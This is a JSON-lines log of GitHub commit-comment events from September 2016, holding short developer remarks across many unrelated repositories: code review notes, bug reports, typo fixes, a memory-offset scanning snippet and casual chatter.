{"id":"4546670964","type":"CommitCommentEvent","actor":{"login":"Arxos0012"},"repo":{"name":"WiredCatsRobotics2415/Fall2016-Modules-GitHubTutorial"},"payload":{"comment":{"id":18978472,"position":null,"line":null,"path":null,"commit_id":"403603e84bf4c8c8182e7b5696b0a9d5275cb232","created_at":"2016-09-11T22:49:08Z","updated_at":"2016-09-11T22:49:08Z","body":"You weebs, never change"}},"created_at":"2016-09-11T22:49:08Z"}
{"id":"4546673998","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18978478,"position":null,"line":null,"path":null,"commit_id":"e8038ad22769b05ba62900460566ec0f74750a70","created_at":"2016-09-11T22:51:30Z","updated_at":"2016-09-11T22:51:30Z","body":"yay, better grammar!\r\nI was hoping this would happen after reading the gatling round description.\r\n:trollface:"}},"created_at":"2016-09-11T22:51:30Z"}
{"id":"4546674506","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18978479,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-11T22:51:54Z","updated_at":"2016-09-11T22:51:54Z","body":"Did you verified that this work? If we don't have a test for this, then it still doesn't work."}},"created_at":"2016-09-11T22:51:54Z"}
{"id":"4546675896","type":"CommitCommentEvent","actor":{"login":"neetVeritas"},"repo":{"name":"neetVeritas/pye-module"},"payload":{"comment":{"id":18978481,"position":null,"line":null,"path":null,"commit_id":"0d64c4778e89a6519d6afd172827fa6c607e9ddf","created_at":"2016-09-11T22:52:54Z","updated_at":"2016-09-11T22:52:54Z","body":"If you're attempting to scan for pointers, you're better off finding a signature for the base and iterating through offsets. Please take a note that if you're reading random addresses that point to nothing, you're also going to encounter null ptr errors.\r\n\r\n```c++\r\nunsigned int base = scan('00 00 00');\r\nunsigned int range = 0xFFFFF;\r\nint expected = 192;\r\nfor(unsigned i = 0x0; i < range; ++i) {\r\n  if( * (INT * )( * (DWORD * ) base + i ) == expected ) {\r\n     * (INT * )( * (DWORD * ) base + i ) = 0;\r\n     break;\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-11T22:52:54Z"}
{"id":"4546677471","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18978482,"position":13,"line":67,"path":"patches/minecraft/net/minecraft/item/ItemStack.java.patch","commit_id":"5964bf8cb2df50057e00960a6ab33d863c7ae23a","created_at":"2016-09-11T22:54:02Z","updated_at":"2016-09-11T22:54:02Z","body":"That was my intention, guess my fingers were on autopilot."}},"created_at":"2016-09-11T22:54:02Z"}
{"id":"4546678030","type":"CommitCommentEvent","actor":{"login":"ryanbr"},"repo":{"name":"gorhill/uBlock"},"payload":{"comment":{"id":18978483,"position":null,"line":null,"path":null,"commit_id":"921bdfeba78ae1b37ab3810de7c121233b2b195e","created_at":"2016-09-11T22:54:28Z","updated_at":"2016-09-11T22:54:28Z","body":"\"The uBlock Orign authors\" typo"}},"created_at":"2016-09-11T22:54:28Z"}
{"id":"4546678077","type":"CommitCommentEvent","actor":{"login":"blakefren"},"repo":{"name":"blakefren/FooBarChallenge"},"payload":{"comment":{"id":18978484,"position":null,"line":null,"path":null,"commit_id":"07d0062461d4a9ae88bde894da82025e6e62d7a4","created_at":"2016-09-11T22:54:31Z","updated_at":"2016-09-11T22:54:31Z","body":"Uploading previous solutions"}},"created_at":"2016-09-11T22:54:31Z"}
{"id":"4546678407","type":"CommitCommentEvent","actor":{"login":"yakesiita"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":18978485,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-11T22:54:48Z","updated_at":"2016-09-11T22:54:48Z","body":"The master keys you send me are incorrect "}},"created_at":"2016-09-11T22:54:48Z"}
{"id":"4546679878","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18978486,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T22:55:57Z","updated_at":"2016-09-11T22:55:57Z","body":"That's awsome!\r\n"}},"created_at":"2016-09-11T22:55:57Z"}
{"id":"4546679973","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18978487,"position":null,"line":null,"path":null,"commit_id":"871187a7cb3175e9f5e2ffaf049eead8fd1420a7","created_at":"2016-09-11T22:56:03Z","updated_at":"2016-09-11T22:56:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;r0elUyzj&#x2F;11-implement-logging-for-celery-tasks\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement logging for Celery tasks.</a>"}},"created_at":"2016-09-11T22:56:03Z"}
{"id":"4546681560","type":"CommitCommentEvent","actor":{"login":"jbleyel"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18978488,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-11T22:57:20Z","updated_at":"2016-09-11T22:57:20Z","body":"Wieso hast du nicht alles wieder zurückgedreht auf 4ba7b20ebe70b71df95e2229d1fc305b8ef9f213? \r\nIch hab jetzt 501 commits ohne jegliche Änderung.\r\nSieht nicht so schön aus.\r\nKannst du das nicht berichtigen?\r\nDas muss doch gehen?"}},"created_at":"2016-09-11T22:57:20Z"}
{"id":"4546686466","type":"CommitCommentEvent","actor":{"login":"scanavan"},"repo":{"name":"scanavan/PoseEstimation"},"payload":{"comment":{"id":18978490,"position":null,"line":null,"path":null,"commit_id":"c26e8cc242ed50f442c96ed76cf5935442414b70","created_at":"2016-09-11T23:00:51Z","updated_at":"2016-09-11T23:00:51Z","body":"This is a good start, however, I would change the number of frames you are checking for yawn.\r\n\r\nif (countFrames >= 3) \r\n\r\nChecking for >= 3 is very quick. The Kinect runs at about 30 frames per second. So you are checking if their mouth is open 1/10 of a second. This will most likely be true all of the time.\r\n\r\nWe also need to verify how accurate the Kinect really is. If your mouth is open, but the Kinect thinks it is not after it has found that it is open, then it will reset your counter. I'm not sure if this is actually an issue, but it needs tested. We may need to put a time buffer in where the Boolean can toggle a couple of times. We can discuss this on Tuesday as well."}},"created_at":"2016-09-11T23:00:51Z"}
{"id":"4546687165","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18978491,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T23:01:19Z","updated_at":"2016-09-11T23:01:19Z","body":"Right now there is one more issue. You defined many versions of `matrix`. Some of them are actually conflicting with each other. You can see a warning when `using RFlavor`.\r\nFor example both\r\n```\r\nfunction matrix(x::Real, nrow::Integer = 1, ncol::Integer = 1)\r\n    fill(float(x), (Int(nrow), Int(ncol)))\r\nend\r\n```\r\nand \r\n```\r\nfunction matrix(x::Real; nrow::Integer = 1, ncol::Integer = 1)\r\n    matrix(x, Int(nrow), Int(ncol))\r\nend\r\n```\r\ndefined an method for `matrix(x)`. We don't know which one it is going to use.\r\nWe need to clean this out some way.\r\n\r\n"}},"created_at":"2016-09-11T23:01:19Z"}
{"id":"4546687626","type":"CommitCommentEvent","actor":{"login":"jonnywilliamson"},"repo":{"name":"tlaverdure/laravel-echo-server"},"payload":{"comment":{"id":18978492,"position":null,"line":null,"path":null,"commit_id":"1e41fbfad7ebc8c8a66e2e469ffca8a7f2c44b1c","created_at":"2016-09-11T23:01:39Z","updated_at":"2016-09-11T23:01:39Z","body":"@tlaverdure Wait!\r\n\r\nMaybe it's just a syntax error.\r\nhttp://stackoverflow.com/a/4482701\r\n\r\nThis shows the method being used as\r\n```\r\nfs.access(CONFIG_FILE, fs.F_OK, (error) =>\r\n```\r\n\r\ninstead of \r\n\r\n```\r\nfs.access(CONFIG_FILE, fs.constants.F_OK, (error) => {\r\n```\r\n\r\nMaybe there's no `constants` which would make sense for the `no property` on undefined error"}},"created_at":"2016-09-11T23:01:39Z"}
{"id":"4546690003","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18978493,"position":47,"line":47,"path":"docs/CODE_STYLE.md","commit_id":"303bf719ff810114e335e7d562b11f9fc3c3ff57","created_at":"2016-09-11T23:03:08Z","updated_at":"2016-09-11T23:03:08Z","body":"Shouldn't this be 79?"}},"created_at":"2016-09-11T23:03:08Z"}
{"id":"4546690119","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18978494,"position":null,"line":null,"path":null,"commit_id":"f8f6d38931b4a1696f0825302d14a2e2afc6c4a7","created_at":"2016-09-11T23:03:13Z","updated_at":"2016-09-11T23:03:13Z","body":"They work kind of like the looted NS Vibro motors work. When you make a Knuckler for example you can make a vibro unit for it or you can use the looted NS component. These are the same type of thing. When you craft a lightsaber you can craft your own Refined Crystal Packs or you can loot and use these instead"}},"created_at":"2016-09-11T23:03:13Z"}
{"id":"4546690979","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18978495,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T23:03:49Z","updated_at":"2016-09-11T23:03:49Z","body":"Oh, never mind. This can be fixed easily. I'll do it."}},"created_at":"2016-09-11T23:03:49Z"}
{"id":"4546691600","type":"CommitCommentEvent","actor":{"login":"CarlosArriagaCM"},"repo":{"name":"mparus/android_kernel_huawei_msm8916-caf"},"payload":{"comment":{"id":18978496,"position":null,"line":null,"path":null,"commit_id":"fde75808e3e7d3fbb0652b9a9b67865af877a70b","created_at":"2016-09-11T23:04:14Z","updated_at":"2016-09-11T23:04:14Z","body":"hi, this kernel works in Y635?"}},"created_at":"2016-09-11T23:04:14Z"}
{"id":"4546694383","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978500,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:06Z","updated_at":"2016-09-11T23:06:06Z","body":"i hope I am doing the right thing."}},"created_at":"2016-09-11T23:06:06Z"}
{"id":"4546694740","type":"CommitCommentEvent","actor":{"login":"Redlom86"},"repo":{"name":"Redlom86/ENGR113"},"payload":{"comment":{"id":18978501,"position":null,"line":null,"path":null,"commit_id":"e106cb42ab515cc922433fd5ba6f20cc59bf95fc","created_at":"2016-09-11T23:06:22Z","updated_at":"2016-09-11T23:06:22Z","body":"good job, I like to do the same"}},"created_at":"2016-09-11T23:06:22Z"}
{"id":"4546695024","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978503,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:32Z","updated_at":"2016-09-11T23:06:32Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:32Z"}
{"id":"4546695131","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978504,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:37Z","updated_at":"2016-09-11T23:06:37Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:37Z"}
{"id":"4546695220","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978505,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:41Z","updated_at":"2016-09-11T23:06:41Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:41Z"}
{"id":"4546695339","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978506,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:46Z","updated_at":"2016-09-11T23:06:46Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:46Z"}
{"id":"4546695388","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978507,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:49Z","updated_at":"2016-09-11T23:06:49Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:49Z"}
{"id":"4546695441","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978508,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:50Z","updated_at":"2016-09-11T23:06:50Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:50Z"}
{"id":"4546695580","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978509,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:06:56Z","updated_at":"2016-09-11T23:06:56Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:06:56Z"}
{"id":"4546695834","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978510,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:07:08Z","updated_at":"2016-09-11T23:07:08Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:07:08Z"}
{"id":"4546695854","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978511,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:07:10Z","updated_at":"2016-09-11T23:07:10Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:07:10Z"}
{"id":"4546695915","type":"CommitCommentEvent","actor":{"login":"djdavetrouble"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":18978512,"position":null,"line":null,"path":null,"commit_id":"4092d08c8c2fb5f1005e2a35077e666caeb99f39","created_at":"2016-09-11T23:07:11Z","updated_at":"2016-09-11T23:07:11Z","body":"Here goes nothing"}},"created_at":"2016-09-11T23:07:11Z"}
{"id":"4546696636","type":"CommitCommentEvent","actor":{"login":"typedef42"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":18978514,"position":null,"line":null,"path":null,"commit_id":"4680dcd9994bb3416ad74454a18a8eb13e751b13","created_at":"2016-09-11T23:07:47Z","updated_at":"2016-09-11T23:07:47Z","body":"Well, the travis tests failed because I added a test in postprocessor.spec.js that need the renderer of the world object to be init, and travis doesn't like that we need a WebGL context...\r\nI'll work on that test.spec to fix that asap."}},"created_at":"2016-09-11T23:07:47Z"}
{"id":"4546701193","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978519,"position":null,"line":null,"path":null,"commit_id":"0638c8b4dbbe0f8cd83c7a5a910debbc03498cf3","created_at":"2016-09-11T23:11:04Z","updated_at":"2016-09-11T23:11:04Z","body":"Related to: backdrop/backdrop-issues#952 "}},"created_at":"2016-09-11T23:11:04Z"}
{"id":"4546702355","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18978522,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-11T23:12:00Z","updated_at":"2016-09-11T23:12:00Z","body":"Mbootsector....this is a clear gain in my machine...intel i7 . I would be surprise if it not pass. Very weird if some machines can´t have it as an elo gain."}},"created_at":"2016-09-11T23:12:00Z"}
{"id":"4546703608","type":"CommitCommentEvent","actor":{"login":"cpfoley"},"repo":{"name":"cpfoley/hello-world"},"payload":{"comment":{"id":18978523,"position":null,"line":null,"path":null,"commit_id":"68b302cae5c43133af95303c92058ee0948fe3fb","created_at":"2016-09-11T23:12:59Z","updated_at":"2016-09-11T23:12:59Z","body":"ok"}},"created_at":"2016-09-11T23:12:59Z"}
{"id":"4546704443","type":"CommitCommentEvent","actor":{"login":"riusksk"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":18978524,"position":null,"line":null,"path":null,"commit_id":"ac33183969efa54072d936ce7833f4da05e028d2","created_at":"2016-09-11T23:13:37Z","updated_at":"2016-09-11T23:13:37Z","body":"compiler error in osx:\r\n```\r\nlibhfuzz/compiler_instrument.c:4:17: error: only weak aliases are supported on darwin\r\n__attribute__ ((alias(\"_strcmp\")))\r\n                ^\r\nlibhfuzz/compiler_instrument.c:6:17: error: only weak aliases are supported on darwin\r\n__attribute__ ((alias(\"_strcasecmp\")))\r\n……\r\n```"}},"created_at":"2016-09-11T23:13:37Z"}
{"id":"4546706785","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978528,"position":null,"line":null,"path":null,"commit_id":"a7a0535b56e49760581e55da3a2b1496b835e272","created_at":"2016-09-11T23:15:25Z","updated_at":"2016-09-11T23:15:25Z","body":"Related to: backdrop/backdrop-issues#1699 "}},"created_at":"2016-09-11T23:15:25Z"}
{"id":"4546708233","type":"CommitCommentEvent","actor":{"login":"andreasnoack"},"repo":{"name":"JuliaLang/Compat.jl"},"payload":{"comment":{"id":18978531,"position":null,"line":null,"path":null,"commit_id":"f373714dbc1085943b6dac9f378521b21a9bc2d7","created_at":"2016-09-11T23:16:26Z","updated_at":"2016-09-11T23:16:26Z","body":"https://github.com/JuliaLang/METADATA.jl/pull/6330"}},"created_at":"2016-09-11T23:16:26Z"}
{"id":"4546708363","type":"CommitCommentEvent","actor":{"login":"aschokking"},"repo":{"name":"Team488/SeriouslyCommonLib"},"payload":{"comment":{"id":18978532,"position":null,"line":null,"path":null,"commit_id":"2d7424451f95e210f81288f764ac3d8cf0b4fffd","created_at":"2016-09-11T23:16:32Z","updated_at":"2016-09-11T23:16:32Z","body":"That's a good question. I think we still might end up using a similar locking scheme using subsystems to control what higher level commands are currently owning what inputs. As you said we won't have a maintainer command but we'll still need a way to toggle between pid and manual override."}},"created_at":"2016-09-11T23:16:32Z"}
{"id":"4546709649","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18978534,"position":null,"line":null,"path":null,"commit_id":"115edb86cd517d24e1ef0beb2551fd94860d7578","created_at":"2016-09-11T23:17:30Z","updated_at":"2016-09-11T23:17:30Z","body":"https://android.googlesource.com/platform/cts/+/6b17bbf/tests/tests/media/src/android/media/cts/AudioTrackSurroundTest.java"}},"created_at":"2016-09-11T23:17:30Z"}
{"id":"4546709651","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18978535,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T23:17:30Z","updated_at":"2016-09-11T23:17:30Z","body":"OK, I see. So annoying without a function like `missing` in R."}},"created_at":"2016-09-11T23:17:30Z"}
{"id":"4546710993","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978538,"position":null,"line":null,"path":null,"commit_id":"53ae01054f0a29e79fe3cb9e303b014b04bc1c17","created_at":"2016-09-11T23:18:31Z","updated_at":"2016-09-11T23:18:31Z","body":"Related to: backdrop/backdrop-issues#952 "}},"created_at":"2016-09-11T23:18:31Z"}
{"id":"4546711610","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/levmar"},"payload":{"comment":{"id":18978540,"position":88,"line":88,"path":"cmake/Psi4Macros.cmake","commit_id":"21231f907911e0a8322cdc7c539b58a2c15ebb0f","created_at":"2016-09-11T23:19:03Z","updated_at":"2016-09-11T23:19:03Z","body":"Thanks! You can boot cmake/CheckFortranCompilerFlag.cmake from the repo, too."}},"created_at":"2016-09-11T23:19:03Z"}
{"id":"4546711774","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978541,"position":null,"line":null,"path":null,"commit_id":"639e37a3b848af0a498c82eb95382384e707a8ae","created_at":"2016-09-11T23:19:10Z","updated_at":"2016-09-11T23:19:10Z","body":"Related to: backdrop/backdrop-issues#1699 "}},"created_at":"2016-09-11T23:19:10Z"}
{"id":"4546716615","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18978547,"position":null,"line":null,"path":null,"commit_id":"34deb6e2f7e6edb3c5895c457075beb91ffd465f","created_at":"2016-09-11T23:22:55Z","updated_at":"2016-09-11T23:22:55Z","body":"Related to: backdrop/backdrop-issues#1076 "}},"created_at":"2016-09-11T23:22:55Z"}
{"id":"4546724567","type":"CommitCommentEvent","actor":{"login":"eliasmajad"},"repo":{"name":"IS00121-2016-02-3/STF"},"payload":{"comment":{"id":18978555,"position":null,"line":null,"path":null,"commit_id":"3e75bc2f675fbf47c07744817a9dfe5ae25e5cca","created_at":"2016-09-11T23:29:03Z","updated_at":"2016-09-11T23:29:03Z","body":"profe creo que no tenemos acceso para hacer push al parecer estamos en solo lectura segun vi en foros porque no me deja hacer push del proyecto, no se si ud deba darnos ese acceso"}},"created_at":"2016-09-11T23:29:03Z"}
{"id":"4546725189","type":"CommitCommentEvent","actor":{"login":"L4BORG"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":18978558,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-11T23:29:30Z","updated_at":"2016-09-11T23:29:30Z","body":"No! I'm not trying to say that. I'm merely suggesting that there might be more to this issue and that removing or leaving that check won't fix it."}},"created_at":"2016-09-11T23:29:30Z"}
{"id":"4546726565","type":"CommitCommentEvent","actor":{"login":"jonnywilliamson"},"repo":{"name":"tlaverdure/laravel-echo-server"},"payload":{"comment":{"id":18978564,"position":null,"line":null,"path":null,"commit_id":"1e41fbfad7ebc8c8a66e2e469ffca8a7f2c44b1c","created_at":"2016-09-11T23:30:29Z","updated_at":"2016-09-11T23:30:29Z","body":"https://github.com/tlaverdure/laravel-echo-server/issues/27#issuecomment-246212098"}},"created_at":"2016-09-11T23:30:29Z"}
{"id":"4546728405","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":18978565,"position":null,"line":null,"path":null,"commit_id":"20458de7524a126c7cebeffa5d804d389e5a912a","created_at":"2016-09-11T23:31:54Z","updated_at":"2016-09-11T23:31:54Z","body":"Hey. Thanks for your work, this great!\r\nI noticed one problem. Since some build you change the input-output module (controllers). And this is as follows:\r\n-If use the gamepad, everything works well (in those games where it operates today)\r\n-If the disable gamepad and use the keyboard, pressing keys (single press or press n hold) picture often Freeze until the release the key.\r\nI've tried using a different keyboard and even a keyboard emulator (gamepad as a keyboard, through the program Xpadder), the problem is somewhere in the emulator code.\r\nAnd sometimes (very rarely) frieze of picture can with a gamepad, and to fix it, need to press some times any key on the keyboard.\r\nP.s. Sorry for my bad Englidh :D"}},"created_at":"2016-09-11T23:31:54Z"}
{"id":"4546728636","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978566,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:32:06Z","updated_at":"2016-09-11T23:32:06Z","body":"Oh god the email spam. "}},"created_at":"2016-09-11T23:32:06Z"}
{"id":"4546728662","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"Team488/SeriouslyCommonLib"},"payload":{"comment":{"id":18978567,"position":null,"line":null,"path":null,"commit_id":"2d7424451f95e210f81288f764ac3d8cf0b4fffd","created_at":"2016-09-11T23:32:08Z","updated_at":"2016-09-11T23:32:08Z","body":"The thing that I'm wondering about is what will be changing the motor configuration. I guess that each command that `require()`s the subsystem will need to configure the motor with the proper control mode, PID parameters, brake settings, etc., but then that means that if two commands both need the same control mode that configuration will need to be pulled out somewhere else. I'm not sure I can properly understand what we would need to do without trying to implement one of these systems myself."}},"created_at":"2016-09-11T23:32:08Z"}
{"id":"4546730853","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978569,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:33:48Z","updated_at":"2016-09-11T23:33:48Z","body":"How many different definitions are there?"}},"created_at":"2016-09-11T23:33:48Z"}
{"id":"4546731473","type":"CommitCommentEvent","actor":{"login":"dzxx36gyy"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978570,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-11T23:34:16Z","updated_at":"2016-09-11T23:34:16Z","body":"@yaalsn config全部修改过了，在zhjc1123的版本正常登陆，相同config在此版本就会login failed"}},"created_at":"2016-09-11T23:34:16Z"}
{"id":"4546731508","type":"CommitCommentEvent","actor":{"login":"L4BORG"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":18978571,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-11T23:34:18Z","updated_at":"2016-09-11T23:34:18Z","body":"Purging CS user from DB won't fix it either, since signs can only accept 15 chars / line and CS is doing some mumbojumbo with players with \"too long\" usernames - meaning it would break old shops, then again, players could remake those (if they're not protected), better then kicking players or bugging economy plugins. Maybe?"}},"created_at":"2016-09-11T23:34:18Z"}
{"id":"4546732891","type":"CommitCommentEvent","actor":{"login":"anch0vy"},"repo":{"name":"hikillhikai/Language"},"payload":{"comment":{"id":18978572,"position":null,"line":null,"path":null,"commit_id":"ed8ecf58cd89fe1005e042849be6d1a48f80c0fd","created_at":"2016-09-11T23:35:18Z","updated_at":"2016-09-11T23:35:18Z","body":"wwwwww"}},"created_at":"2016-09-11T23:35:18Z"}
{"id":"4546733173","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978573,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:35:30Z","updated_at":"2016-09-11T23:35:30Z","body":"OH, so who do you like?\r\nMultiple, I assume you mean flirt, you know...\r\nPORTING TO D IS INSANELY ANNOYING!"}},"created_at":"2016-09-11T23:35:30Z"}
{"id":"4546740038","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18978584,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T23:40:52Z","updated_at":"2016-09-11T23:40:52Z","body":"So now for the big question:\r\nWHO WERE YOU FLIRTING WITH?!"}},"created_at":"2016-09-11T23:40:52Z"}
{"id":"4546742052","type":"CommitCommentEvent","actor":{"login":"motatoes"},"repo":{"name":"ImportantCool/gogonzo"},"payload":{"comment":{"id":18978587,"position":null,"line":null,"path":null,"commit_id":"b7c7d7da88bfd1eb27624a19d49b341f70dc6f23","created_at":"2016-09-11T23:42:29Z","updated_at":"2016-09-11T23:42:29Z","body":"This was line raised an exception when we upgrade from simple_email_confirmationv0.12 to v2.0"}},"created_at":"2016-09-11T23:42:29Z"}
{"id":"4546742312","type":"CommitCommentEvent","actor":{"login":"lj2007331"},"repo":{"name":"kaneawk/oneinstack"},"payload":{"comment":{"id":18978588,"position":null,"line":null,"path":null,"commit_id":"b0cfc45c619809761b7b1c1b9b06dc3b274b25d4","created_at":"2016-09-11T23:42:43Z","updated_at":"2016-09-11T23:42:43Z","body":"THX!\r\n9 hours ago, has been submitted to the master\r\nhttps://github.com/lj2007331/oneinstack/commit/68d3023af7e030a42d87a6d02ca05141cf857cfe"}},"created_at":"2016-09-11T23:42:43Z"}
